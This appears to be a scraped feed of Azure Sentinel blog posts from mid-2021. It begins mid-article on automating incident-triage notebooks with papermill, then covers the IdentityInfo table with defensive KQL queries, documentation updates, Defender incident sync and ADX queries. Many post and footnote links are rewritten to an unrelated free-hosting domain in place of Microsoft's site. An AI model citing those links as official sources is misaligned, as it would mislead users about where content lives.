of incidents, you can use a method that leverages <STRONG>Azure Storage Queues</STRONG>. Rather than pull all incidents from Azure Sentinel, the “AutomatedNotebooks-Manager.ipynb” notebook can be configured to pull selected incident IDs from the queue and run the automated notebooks against only those incidents. This following are entirely optional steps that are needed only if you want to use the queue method.</P> <H4>&nbsp;</H4> <H4>Create Storage Queue</H4> <P>For ease of management, we suggest that you create a Storage Queue in the Storage Account used by your Azure ML Workspace (see details earlier in the document to find this). If you choose to use another storage account, ensure that the VM’s Managed Identity is granted access to the Storage Account.</P> <P>To create a queue, navigate to the Storage Account in the Azure Portal and select Queues. From here you can add a new Queue.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="17.png" style="width: 505px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298452iA91C7D807C732266/image-size/large?v=v2&amp;px=999" role="button" title="17.png" alt="17.png" /></span></P> <P>&nbsp;</P> <P>Once the Queue is created you will need to add the Queue name and the Storage Account name to the “AutomatedNotebooks-Manager.ipynb” notebook in the same cell that other variables were added to. In addition, you will need to update the Managed Identity assigned to the Azure VM to add a role of <EM>Storage Queue Data Reader</EM> scoped to the storage account where the Queue is deployed. More details on this role can be<A href="#" target="_blank" rel="noopener"> found here</A>.</P> <H4>&nbsp;</H4> <H4>Configure Notebook to use Storage Queue</H4> <P>The “AutomatedNotebooks-Manager.ipynb” notebook contains the code to enable the collection of Incidents from the Queue but it is commented out by default. To use the queue method, uncomment that code and comment out or delete the cell above it that gets all incidents via the Azure Sentinel API.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="18.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298453iE6BE663313F479F6/image-size/large?v=v2&amp;px=999" role="button" title="18.png" alt="18.png" /></span></P> <H4>&nbsp;</H4> <H4>Configure Incidents to Trigger Notebooks</H4> <P>Once the queue is created you can filter the incidents from Azure Sentinel that you wish to be added to the queue and thus processed by the automated notebooks. This is done with Azure Sentinel Automation Playbooks. For details in creating Playbooks please refer to <A href="#" target="_blank" rel="noopener">this documentation</A>.</P> <P>The required playbook needs only two steps:</P> <OL> <LI>When Azure Sentinel incident creation rule was triggered (Preview)</LI> <LI>Put a message on a queue: <OL> <LI>The <STRONG>Queue Name</STRONG> value should be set to the name of the Queue you created previously.</LI> <LI>The <STRONG>Message </STRONG>should be set to the <STRONG>Incident ARM ID</STRONG> dynamic property.</LI> </OL> </LI> </OL> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="19.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298454iFF0CAF93AEBEBE87/image-size/large?v=v2&amp;px=999" role="button" title="19.png" alt="19.png" /></span></P> <P>Once the playbook is created, configure which analytics rules you want auto triaged and configure these &nbsp;to trigger this playbook when an incident is created. Details on how to configure this can be <A href="#" target="_blank" rel="noopener">found here</A>. &nbsp;This will then write the incident ID to the queue so that it will be picked up by the “AutomatedNotebooks-Manager.ipynb” notebook.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="20.png" style="width: 478px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298455i5BE10646295D7329/image-size/large?v=v2&amp;px=999" role="button" title="20.png" alt="20.png" /></span></P> <P>&nbsp;</P> <P>Once this step is complete and the playbook is attached to one or more analytics, then the solution is configured. The next time a specified incident is triggered the automated notebook solution will trigger.</P> <P>&nbsp;</P> <H2>Using the notebooks during incident triage</H2> <P>Once the automated notebooks are configured you will start to see triaged incidents appearing in your Azure Sentinel instance. You can identify triaged incidents by the presence of a comment in the incident with a link to a notebook:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="21.png" style="width: 271px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298456iA200D68F49B9859C/image-size/large?v=v2&amp;px=999" role="button" title="21.png" alt="21.png" /></span></P> <P>To access the completed triage notebook simply click the link in the comment and you will be directed to Azure ML.</P> <P>Note: the analysts needing to access the triage notebooks will need access to the Azure ML workspace configured in this process.</P> <P>Azure ML will open with the triage notebook automatically, the analyst can then browse the contents of the notebook without needing to interact with the notebook itself, they can simply scroll down to see the output:</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="22.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298457iE16F3149D05E7CB0/image-size/large?v=v2&amp;px=999" role="button" title="22.png" alt="22.png" /></span></P> <P>Notebooks from other incidents are also accessible via the navigation pane on the left hand side of the Azure ML interface. Each notebook is stored with the name of the incident GUID they relate to.</P> <P>&nbsp;</P> <P>The AutomatedNotebooks-IncidentTriage.ipynb and AutomatedNotebooks-Manager.ipynb notebooks can also be modified to include additional triage steps or update actions as required. By default the process enriches entities attached to the incident and only updates the incident severity, however it is possible to perform triage on other elements of the incident and update additional elements automatically. See <A href="#" target="_blank" rel="noopener">MSTICpy</A> for details of functions and features that could easily be added to these notebooks.</P> <H2>&nbsp;</H2> <H2>Troubleshooting</H2> <P>During execution of the “AutomatedNotebooks-Manager.ipynb” notebook a log of activity is written to the file “notebook_execution.log” in the same folder as the AutomatedNotebooks-Manager.ipynb. This provides details of execution flow and which incidents were processed, as such it should be the first thing you check when troubleshooting.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="23.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298458i4124C91FDF212E54/image-size/large?v=v2&amp;px=999" role="button" title="23.png" alt="23.png" /></span></P> <P>If not using the Queue method for incident triggers the mostly likely cause of issues is with the notebooks themselves. The easiest way to troubleshoot these is to run them individually and inspect the output. To trigger the “AutomatedNotebooks-Manager.ipynb” notebook you can manually invoke using Papermill via the CLI with the following command:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">papermill “AutomatedNotebooks-Manager.ipynb” -</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>You will see the notebook output in the terminal to allow you to debug it, alternatively replace the `-` in the command with a file name to write out to the file specified.</P> <P>If this notebook executes as expected, then you can also check the incident triage notebook itself. To do this select an incident in your Azure Sentinel workspace that has some entities attached and get the incident ID. This can be found in the incident view of the Sentinel portal as part of the Incident link. (The ID required is the GUID at the end of the full link text).</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="24.png" style="width: 624px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298459iD318D7BBB2C90CA2/image-size/large?v=v2&amp;px=999" role="button" title="24.png" alt="24.png" /></span></P> <P>From there you can trigger that notebook from the CLI with:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="bash">papermill “AutomatedNotebooks-IncidentTriage.ipynb” debug.ipynb -p incident_id "&lt;INCIDENT ID&gt;" -p ws_id "&lt;YOUR WORKSPACE ID&gt;" -p ten_id "&lt;YOUR TENANT ID&gt;"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>This will run the triage notebook with the Incident ID provided and will write the resulting notebook a file called `debug.ipynb`. This file is a complete copy of the original notebook but with all of the execution results (including any errors). You can open the debug file in Azure ML or other Jupyter notebook environment to check for any execution issues. You can view the file as raw text but the native JSON format makes it difficult to read. You can also convert the notebook to an HTML document using the <A href="#" target="_blank" rel="noopener">nbcovert</A> tool.</P> <P>&nbsp;</P> <P>If you are using the Queue method, you will also want to ensure items are being properly passed to the Queue. This is easily done by browsing to the Queue resource in the Azure Portal. If functioning correctly and the attached incidents have occurred, then the queue should contain full incident links that should appear in the same format as: /subscriptions/796fca0e-7703-476a-9d66-a65d3a7825dd /resourceGroups/Sentinel/providers/Microsoft.OperationalInsights/workspaces/sentinelworkspace/providers/Microsoft.SecurityInsights/Incidents/f9e57a1f-8d1a-4efa-a165-4a48c2b2c46e.</P> <P>&nbsp;</P> <P>Should you encounter issues with this solution please raise an Issue on the <A href="#" target="_self">Azure-Sentinel-Notebooks GitHub repo</A>.</P> <P>&nbsp;</P> <H2>Summary</H2> <P>In this blog we have seen how it is possible to use open source software and Azure services to easily automate the process of executing Jupyter Notebooks linked to Azure Sentinel. This approach can vastly improve the efficiency and effectiveness of SOC operations, as well as forming the core of a software defined monitoring approach. Whilst in this blog we have shown how this process can be used for triaging incidents and supporting first line SOC operations the same pattern could be applied to virtually any security monitoring scenario that involves the repetition of a set of analytical steps, whether it be enrichment of datasets, custom analytics using Python specific features, or threat intelligence processing.&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><A href="https://gorovian.000webhostapp.com/?exam=#_ednref1" target="_blank" rel="noopener" name="_edn1"><SPAN>[i]</SPAN></A> This should be the same KeyVault you set up as a pre-requisite to this solution.</P> <P><A href="https://gorovian.000webhostapp.com/?exam=#_ednref1" target="_blank" rel="noopener" name="_edn1"><SPAN>[i]</SPAN></A> VSCode is recommended for this</P> Fri, 06 Aug 2021 20:03:28 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/software-defined-monitoring-using-automated-notebooks-and-azure/ba-p/2587775 Pete Bryan 2021-08-06T20:03:28Z What's new: IdentityInfo table is now in public preview! https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-identityinfo-table-is-now-in-public-preview/ba-p/2571037 <P>Hey everyone!</P> <P>&nbsp;</P> <P>Having the right information during an investigation is crucial to differentiating between FP and TP, and to starting the ‘Scope of Breach’ process on time, since every second counts.</P> <P>&nbsp;</P> <P>The attack surface used by hackers is often the company’s user and service accounts, so the information about those accounts – who is the user behind them, what are their privileges, and additional data – is important for the analyst to have while investigating those entities.</P> <P>&nbsp;</P> <P>Furthermore, embedding entity information in your analytics rules will result in ‘tailor-made’ analytics for your organization that fit your use cases and scenarios and can reduce FP.</P> <P>&nbsp;</P> <P><FONT size="6">How Do I Start?</FONT></P> <P>&nbsp;</P> <P>If you haven’t enabled UEBA – we encourage you to do so! It’s so <A href="#" target="_blank" rel="noopener">simple</A>.</P> <P>&nbsp;</P> <P>Part of the process of enabling UEBA is providing consent for Sentinel UEBA to synchronize you Azure Active Directory. This allows us to create profiles for user accounts in the organization.</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>If already have UEBA enabled, you will notice that a new table called ‘IdentityInfo’ is now available under ‘Azure Sentinel UEBA’ group in LA.</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-SPOILER> <P>The Identity info table contains a snapshot of the user’s profile: metadata information, groups membership, Azure AD roles assigned and UEBA enrichments.</P> </LI-SPOILER> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="image.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/297590i0E20CDBB8499FD8E/image-size/large?v=v2&amp;px=999" role="button" title="image.png" alt="IdentityInfo table in the Logs blade" /><span class="lia-inline-image-caption" onclick="event.preventDefault();">IdentityInfo table in the Logs blade</span></span></P> <P>&nbsp;</P> <P><FONT size="6">&nbsp;Important information:</FONT></P> <UL> <LI>Once UEBA is enabled, we will sync all your AAD users into the ‘IdentityInfo’ table</LI> <LI>Default retention time for the table is 30 days</LI> <LI>After the initial sync, any changes to made in AAD to your users will be saved in LA in up to 15 minutes.</LI> <LI>Groups &amp; Roles are updated on a daily basis</LI> <LI>Every 21 days we will resync your entire AAD directory, to make sure stale records are updated.</LI> <LI>Note: <UL> <LI>Deleted groups (user was removed from a group) is not supported yet. It will still be listed in the user’s groups membership.</LI> <LI>We only support Azure Active Directory built-in roles for the assigned roles attribute.</LI> <LI>The initial sync might take a few days (depending of the size of the tenant).</LI> </UL> </LI> </UL> <P>&nbsp;</P> <P><FONT size="6">What information can I find there?</FONT></P> <P>&nbsp;</P> <P>The IdentityInfo table contains the following information taken from your Azure Active Directory:</P> <P>&nbsp;</P> <TABLE width="100%"> <THEAD> <TR> <TD width="19%"> <P><STRONG>Column</STRONG></P> </TD> <TD width="5%"> <P><STRONG>Type</STRONG></P> </TD> <TD width="74%"> <P><STRONG>Description</STRONG></P> </TD> </TR> </THEAD> <TBODY> <TR> <TD width="19%"> <P>AccountCloudSID</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure AD security identifier of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountCreationTime</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>The date the user account was created (UTC)</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountDisplayName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account display name</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountDomain</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>Domain name of the user account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>User name of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountObjectId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure Active Directory object ID for the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountSID</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The on premises security identifier of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountTenantId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The Azure Active Directory Tenant ID of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AccountUPN</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>User principal name of the account</P> </TD> </TR> <TR> <TD width="19%"> <P>AdditionalMailAddresses</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>Additional email addresses of the user</P> </TD> </TR> <TR> <TD width="19%"> <P>AssignedRoles</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>AAD roles the user account is assigned to</P> </TD> </TR> <TR> <TD width="19%"> <P>City</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The city of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>Country</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The country of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>DeletedDateTime</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>The date and time the user was deleted</P> </TD> </TR> <TR> <TD width="19%"> <P>Department</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account department as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>GivenName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account given name</P> </TD> </TR> <TR> <TD width="19%"> <P>GroupMembership</P> </TD> <TD width="5%"> <P>dynamic</P> </TD> <TD width="74%"> <P>Azure AD Groups the user account is a member</P> </TD> </TR> <TR> <TD width="19%"> <P>IsAccountEnabled</P> </TD> <TD width="5%"> <P>bool</P> </TD> <TD width="74%"> <P>Indication if the account is enabled in AAD or not</P> </TD> </TR> <TR> <TD width="19%"> <P>JobTitle</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account job title as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>MailAddress</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account primary email address</P> </TD> </TR> <TR> <TD width="19%"> <P>Manager</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user accounts manager alias</P> </TD> </TR> <TR> <TD width="19%"> <P>OnPremisesDistinguishedName</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>Active Directory distinguished name (DN). A DN is a sequence of relative distinguished names (RDN) connected by commas.</P> </TD> </TR> <TR> <TD width="19%"> <P>Phone</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The phone number of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>SourceSystem</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%">&nbsp;</TD> </TR> <TR> <TD width="19%"> <P>State</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The geographical state of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>StreetAddress</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The office street address of the user account as defined in AAD</P> </TD> </TR> <TR> <TD width="19%"> <P>Surname</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user account surname</P> </TD> </TR> <TR> <TD width="19%"> <P>TenantId</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%">&nbsp;</TD> </TR> <TR> <TD width="19%"> <P>TimeGenerated</P> </TD> <TD width="5%"> <P>datetime</P> </TD> <TD width="74%"> <P>Time when the event was generated (UTC)</P> </TD> </TR> <TR> <TD width="19%"> <P>Type</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The name of the table</P> </TD> </TR> <TR> <TD width="19%"> <P>UserType</P> </TD> <TD width="5%"> <P>string</P> </TD> <TD width="74%"> <P>The user type as appears in Azure AD</P> </TD> </TR> </TBODY> </TABLE> <P>&nbsp;</P> <P><FONT size="6">What’s in it for me?</FONT></P> <P>&nbsp;</P> <P>Having user information surfaced in Log Analytics allows you (as a SecOps / Threat Hunter) to address various lines of investigation, for example:</P> <P>&nbsp;</P> <P><EM><STRONG>Which users are members of my "Executive" AAD security group?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">IdentityInfo | summarize arg_max(TimeGenerated, *) by AccountObjectId | where GroupMembership contains "Executive"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM><STRONG>Who are all my guest accounts in the tenant?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">IdentityInfo | summarize arg_max(TimeGenerated, *) by AccountObjectId | where UserType == "Guest"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM><STRONG>Which of my users are only AAD users (i.e. not synced from my on prem AD)?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">IdentityInfo | summarize arg_max(TimeGenerated, *) by AccountObjectId | where isempty(OnPremisesDistinguishedName)</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P><EM><STRONG>Which users have assigned "privileged" Azure Active Directory roles?</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">let PrivielgedRoles = dynamic(["Global Administrator","Security Administrator"]); IdentityInfo | summarize arg_max(TimeGenerated, *) by AccountObjectId | mv-expand AssignedRoles | where AssignedRoles in~ (PrivielgedRoles) | summarize AssignedRoles=make_set(AssignedRoles) by AccountObjectId, AccountSID, AccountUPN, AccountDisplayName, JobTitle, Department</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>SecOps analysts can use this information to create their custom analytics rules:</P> <P>&nbsp;</P> <P><EM><STRONG>I want to be alerted if a specific server is accessed by anyone outside of the ‘Finance Department’.</STRONG></EM></P> <P>&nbsp;</P> <LI-CODE lang="applescript">let LoginEvent = dynamic(["4624","4768","4776"]); SecurityEvent | where EventID in (LoginEvent) | where Computer == "Financesrv.contoso.com" | join kind=innerunique ( IdentityInfo | summarize arg_max(TimeGenerated, *) by AccountObjectId ) on $left.TargetUserSid == $right.AccountSID | where Department != "Finance"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Taking the above example you can extend it even further - if the user is a member of a specific group, don’t trigger alert.</P> <P>&nbsp;</P> <P>In addition when using automation to create a ticket in the ticketing system, pull information about the user from the ‘IdentityInfo’ table .</P> <P><STRONG>&nbsp;</STRONG></P> <P>You can read more about the IdentityInfo table and how to use it in our <A href="#" target="_self">docs</A>.</P> <P><STRONG>&nbsp;</STRONG></P> <P><FONT size="6">What’s next?</FONT></P> <P><STRONG>&nbsp;</STRONG></P> <P>Our goal is to expose to you, the Sentinel user, the we have of the users in your organization. We’re going to constantly add more bits of information we learn about users (example below). In addition, we want to expand the entity profiles we have and surface those in Log Analytics as well (such as DeviceInfo, AppInfo, SecurityGroupInfo, IPaddressInfo…)</P> <P>&nbsp;</P> <P><STRONG>IdentityInfo table features to come:</STRONG></P> <UL> <LI>Applications</LI> <LI>Blast Radius</LI> <LI>EmployeeId</LI> <LI>Extension property from AAD</LI> <LI>Investigation priority – risk score</LI> <LI>Is MFA registered</LI> <LI>Last seen date</LI> <LI>On-prem extension property</LI> <LI>AAD IP risk level and state</LI> <LI>Related service principals</LI> <LI>Tags</LI> <LI>UACFlags</LI> <LI>UserState</LI> <LI>UserStateChangedOn</LI> </UL> <P>&nbsp;</P> <P>We Value Your Opinion!</P> <P>Our goal is to make your life easier while you investigate security incidents. If you have any feedback – about the experience, the usage – or anything else,</P> <P>Please let us know! We aim to improve&nbsp;<img class="lia-deferred-image lia-image-emoji" src="https://techcommunity.microsoft.com/html/@B71AFCCE02F5853FE57A20BD4B04EADDhttps://techcommunity.microsoft.com/images/emoticons/cool_40x40.gif" alt=":cool:" title=":cool:" /></P> <P>&nbsp;</P> <P>&nbsp;</P> Tue, 27 Jul 2021 11:26:53 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-identityinfo-table-is-now-in-public-preview/ba-p/2571037 Itay Argoety 2021-07-27T11:26:53Z What's New: Updated Azure Sentinel Documentation July Edition https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-updated-azure-sentinel-documentation-july-edition/ba-p/2587249 <P><EM>A big thank you to the Azure Sentinel CxE team for helping make this happen and a big thank you to Batami Gold for putting the documents together and organizing them.&nbsp; </EM></P> <P>&nbsp;</P> <P>A new effort has begun to create and upload content around commonly asked questions as well as best practices for using the product. With this, we have posted 3 new documents and updated some others that are live now!</P> <P>&nbsp;</P> <P><STRONG>New documents:</STRONG></P> <P data-unlink="true"><A href="#" target="_self">Pre-deployment best practices</A>:&nbsp;This document serves as a place to check while going through pre-deployment planning. It contains information about topics such as requirements, items to prioritize, and best practices for working with workspaces.</P> <P>&nbsp;</P> <P data-unlink="true"><A href="#" target="_self">General best practices</A>:&nbsp;This document covers general topics, such as tasks to perform and how often they should be performed, integrating Azure Sentinel with the other Microsoft security services, and incident response options.</P> <P>&nbsp;</P> <P data-unlink="true"><A href="#" target="_self">Data collection best practices:</A>&nbsp;&nbsp;This document covers topics to consider when collecting logs, whether it is through a built-in connector or custom method.</P> <P data-unlink="true">&nbsp;</P> <P data-unlink="true">To avoid duplication of information and long running documents, there are best practices that can be found within the different documents for Azure Sentinel. Two examples would be <A href="#" target="_self">commonly used Azure Sentinel workbooks</A>&nbsp;and <A href="#" target="_self">cost and billing</A>. Both documents cover what is recommended and how to go about using the different features or methods within your Azure Sentinel environment. If you don't see something that you would expect, chances are that the item is covered under another document.</P> <P>&nbsp;</P> <P><STRONG>Updated content:</STRONG></P> <P>There are a few documents that have been updated with new content to cover newly developed concepts or questions that have been brought up. An example is the <A href="#" target="_self">costs and billing</A> document, which covers which data sources are free, which services generate cost when using Azure Sentinel, and options for cost management.&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="costsandbilling.gif" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298377iCFB65BAFA6C8DD14/image-size/large?v=v2&amp;px=999" role="button" title="costsandbilling.gif" alt="costsandbilling.gif" /></span></P> <P>&nbsp;</P> <P><STRONG>Updated structure:&nbsp;</STRONG></P> <P>Along with the new content, the navigation pane has been updated as well to have a better flow and easier navigation. Before, documents were given scenario based titles and fell within different topics that included different features within the same bucket. With the update, documents are now broken into subtopics based on feature, with the use case listed within the title. As time goes on, new content and best practices can be found under the feature topics based on relevancy.</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="docs.gif" style="width: 404px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298402i26B263D07746119B/image-size/large?v=v2&amp;px=999" role="button" title="docs.gif" alt="docs.gif" /></span></P> <P>&nbsp;</P> <P>As mentioned, as time goes on we will be adding more content and best practices to our documents so please keep an eye on them! Go ahead and check out the new and updated content within the docs that are out today.</P> <P>&nbsp;</P> <P>If there are topics that are not covered or if you find content that is not helpful, not clear, or out of date, please let us know in the comments here so that we can get the content created!</P> Mon, 26 Jul 2021 18:16:09 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-updated-azure-sentinel-documentation-july-edition/ba-p/2587249 Matt_Lowe 2021-07-26T18:16:09Z Integrating SIEM + XDR: Azure Sentinel and Azure Defender bi-directional incident sync https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/integrating-siem-xdr-azure-sentinel-and-azure-defender-bi/ba-p/2587343 <P>To help defend <SPAN>against today’s evolving </SPAN>threats<SPAN>,</SPAN> SecOps team<SPAN>s</SPAN> need <SPAN>sophisticated </SPAN>tooling that<SPAN> provides both breadth</SPAN><SPAN> of visibility across the entire enterprise</SPAN><SPAN> and</SPAN><SPAN> the</SPAN><SPAN> depth</SPAN><SPAN> needed to investigate threats</SPAN><SPAN>.</SPAN>&nbsp; <SPAN>At Microsoft, we have a unique vision for the future of threat protection. </SPAN>While other vendors offer only a SIEM <SPAN>or </SPAN>XDR, Microsoft<SPAN>’s</SPAN> perspective is that SecOps can benefit from both. A SIEM delivers visibility into the full kill chain<SPAN> across the entire organization,</SPAN> including third party data<SPAN>, </SPAN><SPAN>while </SPAN>XDR delivers <SPAN>deeper </SPAN>insights<SPAN> with </SPAN>contextual alerts for multi-cloud and multi-platform resources to reduce false alerts.&nbsp;</P> <P><SPAN>At </SPAN><SPAN>Microsoft Ignite 2021 i</SPAN><SPAN>n</SPAN><SPAN> March</SPAN><SPAN>,</SPAN> we <SPAN><A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/microsoft-ignite-2021-what-s-new-in-azure-sentinel/ba-p/2175225" target="_blank" rel="noopener">announced</A></SPAN><SPAN> an important step in bringing you the most integrated SIEM and XDR on the market with the release of</SPAN> incident sharing <SPAN>between </SPAN>Microsoft 365 Defender and Azure Sentinel.&nbsp; Today<SPAN>,</SPAN> we are <SPAN>continuing the journey </SPAN><SPAN>by </SPAN>announcing the public preview of incident sharing for Azure Defender and Azure Sentinel.&nbsp; <SPAN>Now, </SPAN>Microsoft delivers the only integrated SIEM and XDR with incident sharing across the full set of components.</P> <P>Using this new capability, customers can use Azure Sentinel as their single pane of glass for incident triage, leverage Microsoft 365 Defender or Azure Defender for incident investigation and remediation<SPAN>,</SPAN> and <SPAN> stay seamlessly in-sync across all three products</SPAN>. This <SPAN>new capability </SPAN>helps reduce the overall time you spend on responding to incidents – giving you more time to focus on what’s important.</P> <P>&nbsp;</P> <H1>How does it work?</H1> <P>Azure Defender &amp; Sentinel bi-directional status sync will automatically sync alerts and incidents statuses between the products:</P> <UL> <LI>Closing or updating incidents in Azure Sentinel containing Azure Defender alerts will automatically close/update the status of the alert in the Azure Defender portal.</LI> <LI>Alerts closed in the Azure Defender will be reflected as closed in Sentinel, but the status of the incident containing them will remain unchanged.</LI> </UL> <P>&nbsp;</P> <H1>How to enable it?</H1> <OL> <LI>In Azure Sentinel, navigate to the data connectors tab and open the Azure Defender data connector.</LI> <LI>You can configure on which subscriptions you would like the bi-directional sync to take effect by changing the drop down in the “Bi-directional sync (Preview)” column to “Enabled”. <OL> <LI>Notice – enabling bi-directional sync required <STRONG>contributor</STRONG> permission in the selected subscription.</LI> </OL> </LI> <LI>To enable bi-directional sync on several subscriptions at once, mark their check boxes and select the “Enable bi-directional sync” button on the bar above the list.</LI> </OL> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="ScottWoodgate_0-1627312328936.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/298375i60E2615E0E6BD7C6/image-size/medium?v=v2&amp;px=400" role="button" title="ScottWoodgate_0-1627312328936.png" alt="ScottWoodgate_0-1627312328936.png" /></span></P> <P>&nbsp;</P> <P>We are excited about these new capabilities and will continue our mission to help you protect your companies.&nbsp; Stay tuned for more SIEM and XDR integration!</P> <P>&nbsp;</P> <H1>Further reading</H1> <UL> <LI>Official Azure Sentinel documentation - <A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/sentinel/connect-azure-security-center</A></LI> <LI><A href="#" target="_blank" rel="noopener">https://docs.microsoft.com/en-us/azure/security-center/export-to-siem#stream-alerts-to-azure-sentinel</A></LI> </UL> Mon, 26 Jul 2021 17:25:04 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/integrating-siem-xdr-azure-sentinel-and-azure-defender-bi/ba-p/2587343 Scott Woodgate 2021-07-26T17:25:04Z What’s New: Azure Sentinel Hunting supports ADX cross-resource queries https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-azure-sentinel-hunting-supports-adx-cross-resource/ba-p/2530678 <P>Now in preview, you can use Azure Data Explorer (ADX) <A href="#" target="_blank" rel="noopener">cross-resource queries</A> from with-in the hunting query page, the livestream page, and the logs (Log Analytics) page. Although Log Analytics remains the primary data storage location for performing analysis with Azure Sentinel, there are cases where ADX is required to store data due to cost, retention periods, or other factors. &nbsp;</P> <P>&nbsp;</P> <P><SPAN class="TrackChangeTextInsertion TrackedChange BCX8 SCXW253823728"><SPAN class="TextRun BCX8 SCXW253823728" data-contrast="none"><SPAN class="NormalTextRun BCX8 SCXW253823728" data-ccp-parastyle="Normal (Web)">You can learn more about sending logs from Azure Sentinel to Azure Data Explorer for long-term retention here</SPAN></SPAN></SPAN><SPAN class="TrackChangeTextInsertion TrackedChange BCX8 